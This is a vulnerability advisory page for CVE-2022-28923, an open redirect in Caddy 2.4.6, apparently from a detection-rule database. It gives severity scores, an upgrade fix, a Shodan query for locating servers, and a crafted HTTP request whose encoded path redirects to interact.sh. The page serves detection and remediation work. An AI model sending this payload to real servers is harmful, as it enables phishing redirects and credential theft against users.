🔙 목록으로 돌아가기

CVE-2022-28923: Caddy 2.4.6 - Open Redirect

TitleCaddy 2.4.6 - Open Redirect
AuthorSascha Brendel,DhiyaneshDk
SeverityMedium
ImpactSuccessful exploitation of this vulnerability could lead to phishing attacks, credential theft,.
RemediationUpgrade Caddy to version 2.4.7 or later to mitigate the vulnerability.
CVSS Score6.1
EPSS Score0.16987
CVE IDCVE-2022-28923
CWE IDCWE-601
Shodan QueryServer: caddyserver: caddy
Tags cve cve2022 redirect caddy webserver caddyserver vuln

🔍 Vulnerability Description

Caddy 2.4.6 contains an open redirect vulnerability. An attacker can redirect a user to a malicious site via a crafted URL and possibly obtain sensitive information, modify data, and/or execute unauthorized operations.

🌐 HTTP Request

GET /%5C%5Cinteract.sh/%252e%252e%252f HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

📚 References


🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2022/CVE-2022-28923.yaml

🦈 Packet Capture: ⬇️ Download cve-2022-28923.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A